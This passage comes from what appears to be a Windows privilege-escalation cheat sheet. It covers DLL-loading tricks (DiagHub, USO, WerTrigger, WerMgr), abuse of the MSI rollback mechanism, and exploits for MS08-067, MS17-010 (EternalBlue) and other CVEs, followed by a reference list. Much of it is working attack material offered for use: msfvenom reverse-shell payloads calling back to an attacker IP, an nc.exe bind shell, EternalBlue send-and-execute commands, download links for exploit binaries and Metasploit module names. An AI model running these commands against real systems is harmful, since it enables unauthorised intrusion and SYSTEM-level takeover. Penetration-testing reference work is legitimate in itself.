1347 3. `diaghub.exe c:\\ProgramData\\ payload.dll` 1348 1349 The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe` 1350 1351 Alternative tools: 1352 1353 * [Accenture/AARO-Bugs/CVE-2020-5825/TrigDiag](https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag) 1354 * [decoder-it/diaghub_exploit](https://github.com/decoder-it/diaghub_exploit) 1355 1356 ### UsoDLLLoader 1357 1358 :warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. 1359 1360 > An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo) 1361 1362 If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**. 1363 1364 #### Exploit 1365 1366 1. Build [itm4n/UsoDllLoader](https://github.com/itm4n/UsoDllLoader) 1367 * Select Release config and x64 architecure. 1368 * Build solution. 1369 * DLL .\x64\Release\WindowsCoreDeviceInfo.dll 1370 * Loader .\x64\Release\UsoDllLoader.exe. 1371 2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\` 1372 3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337. 1373 1374 ### WerTrigger 1375 1376 > Exploit Privileged File Writes bugs with Windows Problem Reporting 1377 1378 1. Clone [sailay1996/WerTrigger](https://github.com/sailay1996/WerTrigger) 1379 2. Copy `phoneinfo.dll` to `C:\Windows\System32\` 1380 3. Place `Report.wer` file and `WerTrigger.exe` in a same directory. 1381 4. Then, run `WerTrigger.exe`. 1382 5. Enjoy a shell as **NT AUTHORITY\SYSTEM** 1383 1384 ### WerMgr 1385 1386 > Exploit Privileged Directory Creation Bugs with Windows Error Reporting 1387 1388 1. Clone [binderlabs/DirCreate2System](https://github.com/binderlabs/DirCreate2System) 1389 2. Create directory `C:\Windows\System32\wermgr.exe.local\` 1390 3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` 1391 4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. 1392 5. Enjoy a shell as **NT AUTHORITY\SYSTEM** 1393 1394 ## EoP - Privileged File Delete 1395 1396 During an MSI installation, the Windows Installer service maintains a record of every changes in case it needs to be rolled back, to do that it will create: 1397 1398 * a folder at `C:\Config.Msi` containing 1399 * a rollback script (`.rbs`) 1400 * a rollback file (`.rbf`) 1401 1402 To convert a privileged file delete to a local privilege escalation, you need to abuse the Windows Installer service. 1403 1404 * delete the protected `C:\Config.Msi` folder immediately after it's created by the Windows Installer 1405 * recreate the `C:\Config.Msi` folder with weak DACL permissions since ordinary users are allowed to create folders at the root of `C:\`. 1406 * drop malicious `.rbs` and `.rbf` files into it to be executed by the MSI rollback 1407 * then upon rollback, Windows Installer will make arbitrary changes to the system 1408 1409 The easiest way to trigger this chain is using [thezdi/FilesystemEoPs/FolderOrFileDeleteToSystem](https://github.com/thezdi/PoC/tree/master/FilesystemEoPs/FolderOrFileDeleteToSystem). 1410 The exploit contains a .msi file with 2 actions, the first one produces a delay and the second throws an error to make it rollback. This rollback will "restore" a malicious HID.dll in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. 1411 1412 Then switch to the secure desktop using `[CTRL]+[ALT]+[DELETE]` and open the On-Screen Keyboard (`osk.exe`). 1413 The `osk.exe` process first looks for the `C:\Program Files\Common Files\microsoft shared\ink\HID.dll` library instead of `C:\Windows\System32\HID.dll` 1414 1415 ## EoP - Common Vulnerabilities and Exposure 1416 1417 ### MS08-067 (NetAPI) 1418 1419 Check the vulnerability with the following nmap script. 1420 1421 ```c 1422 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock> 1423 ``` 1424 1425 Metasploit modules to exploit `MS08-067 NetAPI`. 1426 1427 ```powershell 1428 exploit/windows/smb/ms08_067_netapi 1429 ``` 1430 1431 If you can't use Metasploit and only want a reverse shell. 1432 1433 ```powershell 1434 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py 1435 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows 1436 1437 Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 1438 Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) 1439 Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal 1440 Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English 1441 Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) 1442 Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) 1443 Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) 1444 python ms08-067.py 10.0.0.1 6 445 1445 ``` 1446 1447 ### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 1448 1449 'KiTrap0D' User Mode to Ring Escalation (MS10-015) 1450 1451 ```powershell 1452 https://www.exploit-db.com/exploits/11199 1453 1454 Metasploit : exploit/windows/local/ms10_015_kitrap0d 1455 ``` 1456 1457 ### MS11-080 (afd.sys) - Microsoft Windows XP/2003 1458 1459 ```powershell 1460 Python: https://www.exploit-db.com/exploits/18176 1461 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf 1462 ``` 1463 1464 ### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 1465 1466 ```powershell 1467 printf("[#] usage: ms15-051 command \n"); 1468 printf("[#] eg: ms15-051 \"whoami /all\" \n"); 1469 1470 # x32 1471 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe 1472 1473 # x64 1474 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe 1475 1476 https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 1477 use exploit/windows/local/ms15_051_client_copy_image 1478 ``` 1479 1480 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) 1481 1482 Check if the patch is installed : `wmic qfe list | findstr "3139914"` 1483 1484 ```powershell 1485 Powershell: 1486 https://www.exploit-db.com/exploits/39719/ 1487 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 1488 1489 Binary exe : https://github.com/Meatballs1/ms16-032 1490 1491 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc 1492 ``` 1493 1494 ### MS17-010 (Eternal Blue) 1495 1496 Check the vulnerability with the following nmap script or netexec: `netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. 1497 1498 ```c 1499 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock> 1500 ``` 1501 1502 Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. 1503 1504 ```powershell 1505 auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1506 auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection 1507 exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1508 exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 1509 exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 1510 ``` 1511 1512 If you can't use Metasploit and only want a reverse shell. 1513 1514 ```powershell 1515 git clone https://github.com/helviojunior/MS17-010 1516 1517 # generate a simple reverse shell to use 1518 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe 1519 python2 send_and_execute.py 10.0.0.1 revshell.exe 1520 ``` 1521 1522 ### CVE-2019-1388 1523 1524 Exploit : [packetstormsecurity/hhupd.exe](https://packetstormsecurity.com/files/14437/hhupd.exe.html) 1525 1526 Requirement: 1527 1528 * Windows 7 1529 * Windows 10 LTSC 10240 1530 1531 Failing on : 1532 1533 * LTSC 2019 1534 * 1709 1535 * 1803 1536 1537 Detailed information about the vulnerability : [Thanksgiving Treat: Easy-as-Pie Windows 7 Secure Desktop Escalation of Privilege - Simon Zuckerbraun - November 19, 2019](https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege) 1538 1539 ## References 1540 1541 * [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - Simon Zuckerbraun - March 17, 2022](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) 1542 * [Abusing Diaghub - xct - March 7, 2019](https://vulndev.io/2019/03/06/abusing-diaghub/) 1543 * [Abusing SeLoadDriverPrivilege for privilege escalation - June 14, 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) 1544 * [Abusing the SeRelabelPrivilege - @decoder_it - May 30, 2024](https://decoder.cloud/2024/05/30/abusing-the-serelabelprivilege/) 1545 * [Alternative methods of becoming SYSTEM - Adam Chester @_xpn_ - November 20, 2017](https://blog.xpnsec.com/becoming-system/) 1546 * [Basic Linux Privilege Escalation - g0tmi1k - August 2, 2011](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 1547 * [Bypassing AppLocker by abusing HashInfo - Ian - August 19, 2022](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) 1548 * [Chapter 4 - Windows Post-Exploitation - dostoevskylabs - November 2, 2017](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) 1549 * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://web.archive.org/web/20191105182846/https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) 1550 * [Deleting Your Way Into SYSTEM: Why Arbitrary File Deletion Vulnerabilities Matter - ANDREW OLIVEAU - SEP 11, 2023](https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities) 1551 * [Escalating Privileges via Third-Party Windows Installers - ANDREW OLIVEAU - JUL 19, 2023](https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers) 1552 * [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) 1553 * [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) 1554 * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) 1555 * [IN THE POTATO FAMILY, I WANT THEM ALL - @BlWasp_](https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all) 1556 * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) 1557 * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) 1558 * [MSI Shenanigans. Part 1 – Offensive Capabilities Overview - DECEMBER 8, 2022 - Mariusz Banach](https://mgeeky.tech/msi-shenanigans-part-1/) 1559 * [MSIFortune - LPE with MSI Installers - Oct 3, 2023 - PfiatDe](https://badoption.eu/blog/2023/10/03/MSIFortune.html) 1560 * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) 1561 * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) 1562 * [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) 1563 * [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/) 1564 * [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) 1565 * [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/) 1566 * [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/) 1567 * [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) 1568 * [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) 1569 * [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/) 1570 * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) 1571 * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) 1572 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) 1573 * [Potatoes - Windows Privilege Escalation - Jorge Lajara - November 22, 2020](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) 1574 * [Privilege Escalation Windows - Philip Linghammar](https://web.archive.org/web/20191231011305/https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) 1575 * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) 1576 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) 1577 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) 1578 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) 1579 * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) 1580 * [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) 1581 * [Webinar - Windows Client Privilege Escalation - Oddvar Moe - March 26, 2025](https://www.youtube.com/watch?v=EG2Mbw2DVnU) 1582 * [Windows Client Privilege Escalation-Shared.pptx - Oddvar Moe - March 27, 2025](https://fr.slideshare.net/slideshow/windows-client-privilege-escalation-shared-pptx/277239036) 1583 * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) 1584 * [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) 1585 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) 1586 * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)